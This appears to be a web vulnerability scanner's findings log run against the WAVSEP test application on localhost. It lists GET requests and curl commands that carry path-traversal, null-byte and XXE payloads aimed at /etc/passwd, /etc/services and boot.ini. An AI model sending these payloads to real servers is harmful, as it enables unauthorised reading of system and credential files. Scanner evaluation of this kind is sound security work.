GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
